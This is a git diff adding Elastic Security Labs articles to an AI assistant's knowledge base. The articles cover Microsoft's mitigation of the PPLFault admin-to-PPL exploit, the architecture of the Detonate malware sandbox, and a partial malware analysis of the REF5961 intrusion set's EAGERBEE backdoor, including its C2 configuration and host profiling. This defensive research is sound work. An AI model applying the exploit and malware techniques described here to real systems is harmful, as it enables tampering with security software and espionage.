diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/inside_microsofts_plan_to_kill_pplfault.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/inside_microsofts_plan_to_kill_pplfault.md
new file mode 100644
index 0000000000000..3480467f1675c
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/inside_microsofts_plan_to_kill_pplfault.md
@@ -0,0 +1,128 @@
+---
+title: "Inside Microsoft's plan to kill PPLFault"
+slug: "inside-microsofts-plan-to-kill-pplfault"
+date: "2023-09-15"
+description: "In this research publication, we'll learn about upcoming improvements to the Windows Code Integrity subsystem that will make it harder for malware to tamper with Anti-Malware processes and other important security features."
+author:
+  - slug: gabriel-landau
+image: "photo-edited-04@2x.jpg"
+category:
+  - slug: security-research
+tags:
+  - security-research
+  - detection-science
+---
+
+On September 1, 2023, Microsoft released a new build of Windows Insider Canary, version 25941. Insider builds are pre-release versions of Windows that include experimental features that may or may not ever reach General Availability (GA). Build 25941 includes improvements to the Code Integrity (CI) subsystem that mitigate a long-standing issue that enables attackers to load unsigned code into Protected Process Light (PPL) processes.
+
+The PPL mechanism was introduced in Windows 8.1, enabling specially-signed programs to run in such a way that they are protected from tampering and termination, even by administrative processes. The goal was to keep malware from running amok — tampering with critical system processes and terminating anti-malware applications. There is a hierarchy of PPL “levels,” with higher-privilege ones immune from tampering by lower-privilege ones, but not vice-versa. Most PPL processes are managed by Microsoft but members of the [Microsoft Virus Initiative](https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/virus-initiative-criteria?view=o365-worldwide) are allowed to run their products at the [less-trusted Anti-Malware PPL level](https://learn.microsoft.com/en-us/windows/win32/services/protecting-anti-malware-services-).
+
+![A simplified diagram of the heirarchy of PPL levels](/assets/images/inside-microsofts-plan-to-kill-pplfault/PPL-Table.jpg)
+
+A few core Windows components run at the highest level of PPL, called Windows Trusted Computing Base (**WinTcb-Light**). Because of the protection afforded to these components and their narrow scope of function, they are considered more trusted than most user mode code. Most of these processes (such as **csrss.exe**) and their complex kernel-mode counterparts (such as **win32k.sys**) were written decades ago under different assumptions when the kernel-user boundary was even weaker than it is today. Rather than rewrite all these components, Microsoft made these user mode processes **WinTcb-Light**, mitigating tampering and injection attacks. [Alex Ionescu](https://twitter.com/aionescu) stated it clearly in 2013:
+
+>Because the Win32k.sys developers did not expect local code injection attacks to be an issue (they require Administrator rights, after all), many of these APIs didn’t even have SEH, or had other assumptions and bugs. Perhaps most famously, one of these, [discovered by j00ru](http://j00ru.vexillium.org/?p=1393), and still unpatched, has been used as the sole basis of the Windows 8 RT jailbreak. In [Windows 8.1 RT](http://forum.xda-developers.com/showthread.php?t=2092158), this jailbreak is “fixed”, by virtue that code can no longer be injected into Csrss.exe for the attack. [Similar](http://j00ru.vexillium.org/?p=1455) Win32k.sys exploits that relied on Csrss.exe are also mitigated in this fashion.
+
+To reduce the attack surface, Microsoft runs most of their PPL code with less privilege than **WinTcb-Light**:
+
+![APPL processes in Windows 11 22H2, as seen in Process Explorer
+](/assets/images/inside-microsofts-plan-to-kill-pplfault/image4.png)
+
+Microsoft does not consider PPL to be a [security boundary](https://www.microsoft.com/en-us/msrc/windows-security-servicing-criteria), meaning they won’t prioritize security patches for code-execution vulnerabilities discovered therein, but they have historically [addressed](https://itm4n.github.io/the-end-of-ppldump/) some such [vulnerabilities](https://x.com/GabrielLandau/status/1683854578767343619?s=20) on a less-urgent basis.
+
+### Loading code into PPL processes
+
+To load code into a PPL process, it must be signed by special certificates. This applies to both executables (process creation) and libraries (DLLs loads). For the sake of simplicity, we’ll focus on DLL loading, but the CI validation process is very similar for both. This article is focused on PPL, so we will not discuss kernel mode code integrity.
+
+[Portable Executable](https://learn.microsoft.com/en-us/windows/win32/debug/pe-format) (PE) files come in many extensions, including EXE, DLL, SYS, OCX, CPL, and SCR. While the extension may vary, they’re all quite similar at a binary level. For a PPL process to load and execute a DLL, a few steps must be taken. Note that these steps are simplified, but should be sufficient for this article:
+
+ 1. An application calls **[LoadLibrary](https://learn.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibraryw)**, passing the path to the DLL to be loaded.
+ 2. **LoadLibrary** calls into the loader within NTDLL (e.g. **ntdll!LdrLoadDll**), which opens a handle to the file using an API such as **NtCreateFile**.
+ 3. The loader then passes this file handle to **[NtCreateSection](https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-ntcreatesection)**, asking the kernel memory manager to create a [section object](https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/section-objects-and-views) which describes how the file is to be mapped into memory. A section object is also known as a [file mapping object](https://learn.microsoft.com/en-us/windows/win32/memory/file-mapping) in higher abstraction layers (such as Win32), but since we’re focused on the kernel, we’ll keep calling them section objects. The Windows loader always uses a specific type of section called an [executable image](https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/executable-images) (aka [SEC_IMAGE](https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-createfilemappinga)), which can only be created from PE files.
+ 4. Before returning the section object to user mode, the memory manager checks the digital signature on the file to ensure it meets the requirements for the given level of PPL. The internal memory manager function **MiValidateSectionCreate** relies on the Code Integrity module **ci.dll** to handle the requisite cryptography and [PKI](https://en.wikipedia.org/wiki/Public_key_infrastructure) policy.
+ 5. The memory manager restructures the PE so that it can be mapped into memory and executed. This step involves creating multiple subsections, one for each of the different portions of the PE file that must be mapped differently. For example, global variables may be read-write, whereas the code may be execute-read. To achieve this granularity, the resulting regions of memory must have distinct [page table entries](https://en.wikipedia.org/wiki/Page_table) with different page permissions. Other changes may be applied here, such as applying relocations, but they are out of scope for this research publication.
+ 6. The kernel returns the new section handle to the loader in NTDLL.
+ 7. The NTDLL loader then asks the kernel memory manager to map a [view of the section](https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/section-objects-and-views) into the process address space via the **[NtMapViewOfSection](https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-zwmapviewofsection)** syscall. The memory manager complies.
+ 8. Once the view is mapped, the loader finishes the processing required to create a functional DLL in memory. The details of this are out of scope.
+
+### Page hashes
+
+In the above steps, we can see that a PE’s digital signature is validated during section creation, but there is another way that code can be loaded into the address space of a PPL process - [paging](https://en.wikipedia.org/wiki/Memory_paging).
+
+Unmodified pages belonging to file-backed sections (including **SEC_IMAGE**) can be quickly discarded whenever the system is low on memory because there’s a copy of that exact data on disk. If the page is later touched, the CPU will issue a page fault, and the memory manager’s page fault handler will re-read that data from disk. Because **SEC_IMAGE** sections can only be created from immutable file data, and the signature has already been verified, the data is considered trusted.
+
+PE files may be optionally built with the [**/INTEGRITYCHECK**](https://learn.microsoft.com/en-us/cpp/build/reference/integritycheck-require-signature-check?view=msvc-170) flag. This sets a flag in the PE header that, among other things, instructs the memory manager to create and store hashes of every page (aka “page hashes”) of that PE as sections are created from it. After reading a page from disk, the page fault handler calls **MiValidateInPage** to verify that the page hash hasn’t changed since the signature was initially verified. If the page hash has changed, the handler will raise an exception. This feature is useful for detecting [bit rot](https://en.wikipedia.org/wiki/Data_degradation) in the page file and a few types of attacks. Beyond **/INTEGRITYCHECK** images, page hashes are [also enabled](https://twitter.com/DavidLinsley11/status/1190810926762450944) for all modules loaded into full Protected Processes (not PPL), and drivers loaded into the kernel.
+
+_**Note:** It is possible to create a **SEC_IMAGE** section from a file with [user-writable references](https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-mmdoesfilehaveuserwritablereferences), a tactic employed by techniques like [Process Herpaderping](https://jxy-s.github.io/herpaderping/). The existence of user-writable references means that a file could be modified after the image section is created.  When a program attempts to use such a mutable file, the memory manager first copies the file’s contents to the page file, creating an immutable backing for the image section to prevent tampering. In this case, the section will not be backed by the original file, but instead by the page file. See [this Microsoft article](https://www.microsoft.com/en-us/security/blog/2022/06/30/using-process-creation-properties-to-catch-evasion-techniques/) for more information about user-writable references._
+
+### Exploitation
+
+In September 2022, Gabriel Landau from Elastic Security filed VULN-074311 with MSRC, notifying them of two [zero-day](https://www.trendmicro.com/vinfo/us/security/definition/zero-day-vulnerability) vulnerabilities in Windows: one admin-to-PPL and one PPL-to-kernel. Two exploits for these vulnerabilities were provided named [PPLFault](https://github.com/gabriellandau/PPLFault) and [GodFault](https://github.com/gabriellandau/PPLFault#godfault), respectively, along with their source code. These exploits allow malware to [bypass LSA protection](https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection), terminate or blind EDR software, and modify kernel memory to tamper with core OS behavior - all without the use of any vulnerable drivers. See [this article](https://www.elastic.co/security-labs/forget-vulnerable-drivers-admin-is-all-you-need) for more details on their impact.
+
+The admin-to-PPL exploit PPLFault leverages the fact that page hashes are not validated for PPL and employs the [Cloud Filter API](https://learn.microsoft.com/en-us/windows/win32/api/_cloudapi/) to violate immutability assumptions of files backing **SEC_IMAGE** sections. PPLFault uses paging to inject code into a DLL loaded within a PPL process running as **WinTcb-Light**, the most privileged form of PPL. The PPL-to-kernel exploit GodFault first uses PPLFault to get **WinTcb-Light** code execution, then exploits the kernel’s trust of **WinTcb-Light** processes to modify kernel memory, granting itself full read-write access to physical memory.
+
+Though MSRC [declined](https://www.elastic.co/security-labs/forget-vulnerable-drivers-admin-is-all-you-need) to take any action on these vulnerabilities, the Windows Defender team has [shown interest](https://twitter.com/PhilipTsukerman/status/1683861340207607813?s=20). PPLFault and GodFault were released at [Black Hat Asia](https://www.blackhat.com/asia-23/briefings/schedule/#ppldump-is-dead-long-live-ppldump-31052) in May 2023 alongside a mitigation to stop these exploits called [NoFault](https://github.com/gabriellandau/PPLFault/tree/main/NoFault).
+
+### Mitigation
+On September 1, 2023, Microsoft released build 25941 of Windows Insider Canary. This build adds a new check to the memory manager function **MiValidateSectionCreate** which enables page hashes for all images that reside on remote devices. Comparing 25941 against its predecessor 25936, we can see the following two new basic blocks:
+
+![BinDiff comparison of MiValidateSectionCreate in builds 25936 and 25941](/assets/images/inside-microsofts-plan-to-kill-pplfault/Bindiff.jpg)
+
+Decompiled into C, the new code looks like this:
+
+![New check added in Windows build 25941](/assets/images/inside-microsofts-plan-to-kill-pplfault/New-Code-In-IDA.jpg)
+
+When PPLFault is run, Windows Error Reporting generates an event log indicating a failure during a paging operation:
+
+![PPLFault failing in build 25941 with STATUS_IN_PAGE_ERROR (0xC0000006)](/assets/images/inside-microsofts-plan-to-kill-pplfault/WER-Event-Log.jpg)
+
+PPLFault requires its payload DLL to be loaded over the SMB network redirector to achieve the desired paging behavior. By forcing the use of page hashes for such network-hosted DLLs, the exploit can no longer inject its payload, so the vulnerability is fixed. The aforementioned [NoFault](https://github.com/gabriellandau/PPLFault/tree/main/NoFault) mitigation released at Black Hat also targets network redirectors, blocking such DLL loads into PPL entirely. Elastic Defend 8.9.0 and later block PPLFault - please update if you haven’t already.
+
+Tracking down the exact point of failure in a kernel debugger, we can see the page fault handler invoking CI to validate page hashes, which fails with **STATUS_INVALID_IMAGE_HASH (0xC0000428)**. This is later converted to **STATUS_IN_PAGE_ERROR (0xC0000006)**.
+
+```
+0: kd> g
+Breakpoint 1 hit
+CI!CiValidateImagePages+0x360:
+0010:fffff805`725028b4 b8280400c0      mov     eax,0C0000428h
+7: kd> k
+ # Child-SP          RetAddr               Call Site
+00 fffff508`1b4a6dc0 fffff805`72502487     CI!CiValidateImagePages+0x360
+01 fffff508`1b4a6f90 fffff805`6f2f1bbd     CI!CiValidateImageData+0x27
+02 fffff508`1b4a6fd0 fffff805`6ee35de5     nt!SeValidateImageData+0x2d
+03 fffff508`1b4a7020 fffff805`6efa167b     nt!MiValidateInPage+0x305
+04 fffff508`1b4a70d0 fffff805`6ef9fffe     nt!MiWaitForInPageComplete+0x31b
+05 fffff508`1b4a71d0 fffff805`6ef68692     nt!MiIssueHardFault+0x3fe
+06 fffff508`1b4a72e0 fffff805`6f0a784b     nt!MmAccessFault+0x3b2
+07 fffff508`1b4a7460 00007fff`ccf71500     nt!KiPageFault+0x38b
+08 000000b6`776bf1b8 00007fff`d5500ac0     0x00007fff`ccf71500
+09 000000b6`776bf1c0 00000000`00000000     0x00007fff`d5500ac0
+7: kd> !error C0000428
+Error code: (NTSTATUS) 0xc0000428 (3221226536) - Windows cannot verify the 
+ digital signature for this file. A recent hardware or software change 
+ might have installed a file that is signed incorrectly or damaged, or 
+ that might be malicious software from an unknown source.
+```
+
+### Comparing behavior
+
+With the fix introduced in build 25941, the final vulnerable build is 25936. Running PPLFault in both builds under a kernel debugger, we can use the following WinDbg command to see the files for which CI is computing page hashes:
+
+```
+bp /w "&CI!CipValidatePageHash == @rcx" CI!CipValidateImageHash 
+ "dt _FILE_OBJECT @r8 FileName; g"
+```
+
+This command generates the following WinDbg output for build 25936, before the fix:
+
+![Build 25936 using page hashes only for services.exe](/assets/images/inside-microsofts-plan-to-kill-pplfault/WinDbg-Output-25936.jpg)
+
+Here is the WinDbg output for build 25941, which includes the fix:
+
+![Build 25941 using page hashes for both services.exe and the PPLFault payload DLL loaded over SMB](/assets/images/inside-microsofts-plan-to-kill-pplfault/WinDbg-Output-25941.jpg)
+
+### Conclusion
+
+Despite taking [longer than it perhaps should](https://www.elastic.co/security-labs/forget-vulnerable-drivers-admin-is-all-you-need), it's exciting to see Microsoft taking steps to defend PPL processes (including Anti-Malware) from malware running as admin, and users will benefit if this improvement reaches GA soon. Many features in Insider, even security features, are not available in (and may never reach) GA. Microsoft is very conservative when it comes to changes with potential stability, compatibility, or performance risk; memory manager changes are among the risker types. For example, the PreviousMode kernel exploit mitigation [spotted in Insider last November](https://twitter.com/GabrielLandau/status/1597001955909697536?s=20) still hasn’t reached GA, even after _at least_ 10 months.
+
+_Special thanks to [Grzegorz Tworek](https://twitter.com/0gtweet) for his help reverse engineering some kernel functions._
\ No newline at end of file
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/into_the_weeds_how_we_run_detonate.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/into_the_weeds_how_we_run_detonate.md
new file mode 100644
index 0000000000000..37c7d3a7df38e
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/into_the_weeds_how_we_run_detonate.md
@@ -0,0 +1,149 @@
+---
+title: "Into The Weeds: How We Run Detonate"
+slug: "into-the-weeds-how-we-run-detonate"
+date: "2023-06-13"
+subtitle: "A deeper dive into the technical implementations of Detonate"
+description: "Explore the technical implementation of the Detonate system, including sandbox creation, the supporting technology, telemetry collection, and how to blow stuff up."
+author:
+  - slug: jessica-david
+  - slug: sergey-polzunov
+  - slug: hez-carty
+image: "photo-edited-02@2x.jpg"
+category:
+  - slug: detection-science
+  - slug: tools
+  - slug: security-research
+tags:
+  - detonate
+---
+
+## Preamble
+
+In our [first post](https://www.elastic.co/security-labs/click-click-boom-automating-protections-testing-with-detonate) in our Detonate series, we introduced the Detonate system and what we use it for at Elastic. We also discussed the benefits it provides our team when assessing the performance of our security artifacts.
+
+In this publication, we will break down how Detonate works & dive deeper into the technical implementation. This includes how we’re able to create this sandboxed environment in practice, the technology that supports the overall pipeline, and how we submit information to and read information from the pipeline.
+
+> Interested in other posts on Detonate? Check out [Part 1 - Click, Click…Boom!](https://www.elastic.co/security-labs/click-click-boom-automating-protections-testing-with-detonate) where we introduce Detonate, why we built it, explore how Detonate works, describe case studies, and discuss efficacy testing.
+
+## Architecture
+
+Below is a high-level overview of the Detonate end-to-end architecture.
+
+![The end-to-end Detonate architecture, including how we send input to the API server, each individual worker & associated queue, cloud infrastructure details, and our Elastic data stores.](/assets/images/into-the-weeds-how-we-run-detonate/image8.png)
+
+The overall system consists of a series of message queues and Python workers. Detonation tasks are created by an API server upon accepting a request with as little information as the sample file hash. The task then moves from queue to queue, picked up by workers that execute various operations along the way.  
+The server and workers run in a container on [Amazon ECS](https://aws.amazon.com/ecs/). The pipeline can also be brought up locally using [Docker Compose](https://docs.docker.com/compose/) for early development and feature testing.
+
+### API server
+
+The Detonate API server is a [FastAPI](https://fastapi.tiangolo.com/) python application that accepts a variety of execution target requests: hashes of samples, native commands (in bash or Powershell, with or without arguments), and uploaded files. The server also exposes endpoints for fetching alerts and raw agent telemetry from an Elastic cluster.
+
+The API documentation is generated [automatically](https://fastapi.tiangolo.com/advanced/extending-openapi/) by FastAPI and incorporated into our global API schema.
+
+![The schema includes varies get methods to see information about the running task.](/assets/images/into-the-weeds-how-we-run-detonate/image2.png)
+
+#### Interacting with the API server - CLI
+
+We built a custom Python CLI (command-line interface) tool for interacting with our Detonate server. The CLI tool is built using the Python library [click](https://click.palletsprojects.com/en/8.1.x/) along with [rich](https://github.com/Textualize/rich) for a beautiful formatting experience in a terminal window. The tool is particularly useful for debugging the pipeline, as it can also be run against a local pipeline setup. The tool is installed and runs using [Poetry](https://python-poetry.org/), our preferred tool of choice for managing dependencies and running scripts.
+
+```
+❯ DETONATE_CLI_API_ROOT_URL="${API_ENDPOINT_URL}" \
+	DETONATE_CLI_API_AUTH_HEADER="${API_KEY}" \
+	poetry run cli \
+	--hash "${MY_FILE_HASH}"
+```
+
+![An example of the output from the CLI tool once a hash is submitted. It shows the hash, the task ID, and where along the pipeline the process is as well as the last worker status.](/assets/images/into-the-weeds-how-we-run-detonate/image5.png)
+
+![The full output of a Hash detonation in the console. The links include references to run logs, task information, events and alerts in our Elastic clusters, and more.](/assets/images/into-the-weeds-how-we-run-detonate/image13.png)
+
+#### Interacting with the API server - Web UI
+
+Internally, we host a site called Protections Portal (written using [Elastic UI](https://elastic.github.io/eui/) components) to assist our team with research. For a more interactive experience with the Detonate API, we built a page in the Portal to interact with it. Along with submitting tasks, the Web UI allows users to see the feed of all detonations and the details of each task.
+
+![The Detonate landing page Protections Portal showing the input field for starting a detonation. Below the input is a task that is currently running.](/assets/images/into-the-weeds-how-we-run-detonate/image10.png)
+
+Each task can be expanded to see its full details. We provide the links to the data and telemetry collected during the detonation.
+
+![The UI shows the completed detonation task in the Protections Portal.](/assets/images/into-the-weeds-how-we-run-detonate/image11.png)
+
+#### Interacting with the API server - HTTP client
+
+If our users want to customize how they interact with the Detonate API, they can also run commands using their HTTP client of choice (such as **curl** , **httpie** , etc.). This allows them to add detonations to scripts or as final steps at the end of their own workflows.
+
+### Queues
+
+The pipeline is built on a series of queues and workers. Having very basic requirements for the message queues engine, we decided to go with [Amazon SQS](https://aws.amazon.com/sqs/). One of the many benefits of using a popular service like SQS is the availability of open-source resources and libraries we can build upon. For example, we use [softwaremill/elasticmq](https://github.com/softwaremill/elasticmq) Docker images as a queue engine when running the pipeline locally.
+
+The queues are configured and deployed with Terraform code that covers all our production and staging infrastructure.
+
+### Workers
+
+Each worker is a Python script that acts as both a queue consumer and a queue producer. The workers are implemented in our custom mini-framework, with the boilerplate code for error handling, retries, and monitoring built-in. Our base worker is easily extended, allowing us to add new workers and evolve existing ones if additional requirements arise.
+
+For monitoring, we use the [Elastic APM](https://www.elastic.co/observability/application-performance-monitoring) observability solution. It is incredibly powerful, giving us a view into the execution flow and making debugging pipeline issues a breeze. Below, we can see a Detonate task move between workers in the APM UI:
+
+![The Elastic Observability APM tracing page showing the execution flow of a detonation task. We are able to follow the task between each worker & queue to see where we may have issues or can add improvements.](/assets/images/into-the-weeds-how-we-run-detonate/image12.png)
+
+These software and infrastructure components give us everything we need to perform the submission, execution, and data collection that make up a detonation.
+
+## Detonations
+
+![Caption: by Simon Lee, https://unsplash.com/photos/CKuOXoZ21a8](/assets/images/into-the-weeds-how-we-run-detonate/image3.jpg)
+
+The pipeline can execute commands and samples in Windows, Linux, and macOS virtual machines (VMs). For Windows and Linux environments, we use VM instances in [Google Compute Engine](https://cloud.google.com/compute). With the wide selection of public images, it allows us to provision sandboxed environments with different versions of Windows, Debian, Ubuntu, CentOS, and RHEL.
+
+For macOS environments, we use [mac1.metal instances in AWS](https://aws.amazon.com/ec2/instance-types/mac/) and an on-demand macOS VM provisioning [solution from Veertu called Anka](https://veertu.com/anka-build/). Anka gives us the ability to quickly rotate multiple macOS VMs running on the same macOS bare metal instance.
+
+Detonate is currently focused on the breadth of our OS coverage, scalability, and the collection of contextually relevant data from the pipeline. Fitting sophisticated anti-analysis countermeasures into Detonate is currently being researched and engineered.
+
+### VM provisioning
+
+In order to keep our footprint in the VM to a minimum, we use startup scripts for provisioning. Minimizing our footprint is important because our activities within a VM are included in the events we collect, making analysis more complicated after a run. For Windows and Linux VMs, [GCP startup scripts](https://cloud.google.com/compute/docs/instances/startup-scripts) written in Powershell and bash are used to configure the system; for macOS VMs, we wrote custom bash and AppleScript scripts.
+
+The startup scripts perform these steps:
+
+- **Configure the system**. For example, disable MS Defender, enable macros execution in MS Office, disable automatic system updates, etc.
+- **Download and install Elastic agent**. The script verifies that the agent is properly [enrolled into the Fleet Server](https://www.elastic.co/guide/en/fleet/current/fleet-overview.html) and that the policies are applied.
+- **Download and detonate a sample, or execute a set of commands**. The execution happens in a background process, while the main script collects the STDOUT / STDERR datastreams and sleeps for N seconds.
+- **Collect files from the filesystem (if needed) and upload them into the storage**. This allows us to do any additional verification or debugging once the detonation is complete.
+
+The VM lifecycle is managed by the **start_vm** and **stop_vm** workers. Since we expect some detonations to break the startup script execution flow (e.g., in the case of ransomware), every VM has a TTL set, which allows the **stop_vm** worker to delete VMs not in use anymore.
+
+This clean-slate approach, with the startup script used to configure everything needed for a detonation, allows us to use VM images from the vendors from Google Cloud public images catalog without any modifications!
+
+### Network configuration
+
+Some of the samples we detonate are malicious and might produce malicious traffic, such as network scans, C2 callouts, etc. In order to keep our cloud resources and our vendor’s infrastructure safe, we limit all outgoing traffic from VMs. The instances are placed in a locked-down VPC that allows outgoing connection only to a predefined list of targets. We restrict traffic flows in VPC using Google Cloud’s [routes](https://cloud.google.com/vpc/docs/routes) and [firewall rules](https://cloud.google.com/firewall/docs/firewalls), and AWS’s [security groups](https://docs.aws.amazon.com/vpc/latest/userguide/security-groups.html).
+
+We also make use of [VPC Flow Logs](https://cloud.google.com/vpc/docs/flow-logs) in GCE. These logs allow us to see private network traffic initiated by sandbox VMs in our VPC.
+
+### Telemetry collection
+
+To observe detonations, we use the [Elastic Agent](https://www.elastic.co/elastic-agent) with the [Elastic Defend](https://www.elastic.co/guide/en/security/current/install-endpoint.html) integration installed with all protections in “Detect” (instead of “Protect”) mode. This allows us to collect as much information from a VM as we can, while simultaneously allowing the [Elastic Security](https://www.elastic.co/security) solution to produce alerts and detections.
+
+![The policy settings in Elastic Defend integration for Detonate.](/assets/images/into-the-weeds-how-we-run-detonate/image6.png)
+
+We cover two use cases with this architecture: we can validate protections (comparing events and alerts produced for different OS versions, agent versions, security artifacts deployed, etc) and collect telemetry for analysis (for fresh samples or novel malware) at the same time. All data collected is kept in a persistent Elastic cluster and is available for our researchers.
+
+## Running in production
+
+Recently we completed a full month of running Detonate pipeline in production, under the load of multiple data integrations, serving internal users through UI at the same time. Our record so far is 1034 detonations in a single day, and so far, we haven’t seen any scalability or reliability issues.
+
+![Data from our internal Detonate telemetry, visualized in Kibana.](/assets/images/into-the-weeds-how-we-run-detonate/image4.png)
+
+The bulk of the submissions are Windows-specific samples, for now. We are working on increasing our coverage of Linux and macOS as well – stay tuned for the research blog posts coming soon!
+
+![Additional visualization types can help us further break down how Detonate is being used.](/assets/images/into-the-weeds-how-we-run-detonate/image7.png)
+
+We are constantly improving our support for various file types, making sure the detonation is as close to the intended trigger behavior as possible.
+
+Looking at the detonations from the last month, we see that most of the tasks were completed in under 13 minutes (with a median of 515 seconds). This time includes task data preparation, VM provisioning and cleanup, sample execution, and post-detonation processing.
+
+![Data from our internal Detonate telemetry, generated using custom Python code.](/assets/images/into-the-weeds-how-we-run-detonate/image14.jpg)
+
+These are still early days of the service, so it is normal to see the outliers. Since most of the time in a task is spent waiting for a VM to provision, we can improve the overall execution time by using custom VM images, pre-starting VM instances, and optimizing the startup scripts.
+
+## What's next?
+
+Now that you see how Detonate works, our next posts will dive into more detailed use cases of Detonate. We’ll go further into how these detonations turn into protecting more of our users, including right here at Elastic!
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/introducing_the_ref5961_intrusion_set.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/introducing_the_ref5961_intrusion_set.md
new file mode 100644
index 0000000000000..89cf629c66abe
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/introducing_the_ref5961_intrusion_set.md
@@ -0,0 +1,528 @@
+---
+title: "Introducing the REF5961 intrusion set"
+slug: "introducing-the-ref5961-intrusion-set"
+date: "2023-10-04"
+description: "The REF5961 intrusion set discloses three new malware families targeting ASEAN members. The threat actor leveraging this intrusion set continues to develop and mature their capabilities."
+author:
+  - slug: daniel-stepanic
+  - slug: salim-bitam
+  - slug: cyril-francois
+  - slug: seth-goodwin
+  - slug: andrew-pease
+image: "photo-edited-08@2x.jpg"
+category:
+  - slug: security-research
+  - slug: malware-analysis
+tags:
+  - security-research
+  - malware-analysis
+  - ref5961
+  - ref2924
+  - eagerbee
+  - downtown
+  - rudebird
+---
+
+## Preamble
+
+**Updated October 11, 2023 to include links to the BLOODALCHEMY backdoor.**
+
+Elastic Security Labs continues to monitor state-aligned activity, targeting governments and multinational government organizations in Southern and Southeastern Asia. We’ve observed a batch of new and unique capabilities within a complex government environment. This intrusion set is named REF5961.
+
+In this publication, we will highlight distinctions between malware families, demonstrate relationships to known threats, describe their features, and share resources to identify or mitigate elements of an intrusion. Our intent is to help expose this ongoing activity so the community can better understand these types of threats.
+
+The samples in this research were discovered to be co-residents with a previously reported intrusion set, REF2924 (original reporting [here](https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry) and updated [here](https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns)). The victim is the Foreign Affairs Ministry of a member of the Association of Southeast Asian Nations (ASEAN).  
+
+Elastic Security Labs describes the operators of the REF2924 and REF5961 intrusion sets as state-sponsored and espionage-motivated due to observed targeting and post-exploitation collection activity. Further, the correlation of execution flows, tooling, infrastructure, and victimology of multiple campaigns we’re tracking along with numerous third-party reports makes us confident this is a China-nexus actor.
+
+![REF5961 intrusion execution flow](/assets/images/introducing-the-ref5961-intrusion-set/image27.jpg)
+
+
+Part of this intrusion set includes a new x86-based backdoor called BLOODALCHEMY, and it is covered in depth [here](https://www.elastic.co/security-labs/disclosing-the-bloodalchemy-backdoor).
+
+## Key takeaways
+
+* Elastic Security Labs is disclosing three new malware families:
+  * EAGERBEE
+  * RUDEBIRD
+  * DOWNTOWN
+* Code sharing and network infrastructure have connected malware in this intrusion set to other campaigns
+* The threat actors targeting ASEAN governments and organizations continue to develop and deploy additional capabilities
+
+## EAGERBEE
+
+EAGERBEE is a newly identified backdoor discovered by Elastic Security Labs that loads additional capabilities using remotely-downloaded PE files, hosted in C2. However, its implementation and coding practices reveal a lack of advanced skills from the author, relying on basic techniques.
+
+During our research outlined below, we identified string formatting and underlying behavior that aligns with previous research attributed to a Chinese-speaking threat actor referred to as [LuckyMouse](https://malpedia.caad.fkie.fraunhofer.de/actor/apt27) (APT27, EmissaryPanda).
+
+### Code analysis
+
+EAGERBEE dynamically constructs its Import Address Table (IAT) during runtime, populating a designated data structure with the memory addresses of essential Windows APIs that the malware needs.
+
+![EAGERBEE dynamically constructs its Import Address Table](/assets/images/introducing-the-ref5961-intrusion-set/image25.png)
+
+
+**_Note: Dynamic import tables are used as an anti-analysis technique by malware authors to impair static analysis of their binaries. These techniques prevent most static analysis software from determining the imports and thus force analysts through laborious manual methods to determine what the malware is doing._**
+
+After resolving all the required Windows APIs, the malware creates a mutex with the string `mstoolFtip32W` to prevent multiple instances of the malware from running on the same machine.
+
+![Mutex setup](/assets/images/introducing-the-ref5961-intrusion-set/image1.png)
+
+
+The malware gathers key information about the compromised system:
+* The computer's name is obtained using the `GetComputerNameW` function
+* The malware retrieves the Windows version by utilizing the `GetVersionExW` function
+* A globally unique identifier (GUID) is generated through the `CoCreateGuid` function
+* The processor architecture information is acquired using the `GetNativeSystemInfo` function
+* The ProductName, EditionID, and CurrentBuildNumber are extracted from the designated registry key `SOFTWARE\Microsoft\Windows NT\CurrentVersion`
+
+![Information collection](/assets/images/introducing-the-ref5961-intrusion-set/image19.png)
+
+
+The sample’s operational schedule is controlled by the string `0-5:00:23;6:00:23;`. In our sample the malware conforms to the outlined schedule using the ISO 8601 24-hour timekeeping system: 
+* active from Sunday(0) to Friday(5)
+* all hours between 00 and 23
+* Saturday(6) all hours between 00 and 23
+
+This functionality allows the malware to impose self-restrictions during specific timeframes, showcasing both its adaptability and control.
+
+![Configuration scheduling](/assets/images/introducing-the-ref5961-intrusion-set/image3.png)
+
+
+The malware's C2 addresses are either hardcoded values or stored in an XOR-encrypted file named `c:\users\public\iconcache.mui`. This file is decrypted using the first character as the decryption key.
+
+This configuration file contains a list of semicolon-delimited IP addresses. The format adheres to the structure `IP:PORT`, where the character `s` is optional and instructs the malware to open a Secure Socket Layer (SSL) for encrypted communication between C2 and the malware.
+![Malware’s hardcoded configuration of C2 IPs](/assets/images/introducing-the-ref5961-intrusion-set/image18.png)
+
+
+The configuration optionally accepts a list of port numbers on which the malware will listen. The specific configuration mode, whether it's for reverse or forward connections, determines this behavior.
+
+A configuration flag is embedded directly into the code in both operating modes. This flag empowers the malware to select between utilizing SSL encryption during its interactions with the C2 server or plain text communication.
+
+In passive listening mode, the malware opens a listening socket on the port indicated in its configuration.
+
+When operating in active connection mode, the malware attempts to load its configuration from the file `c:\users\public\iconcache.mui`. In the event that this file is not found, the malware falls back to its hardcoded configuration to acquire the necessary IPs
+
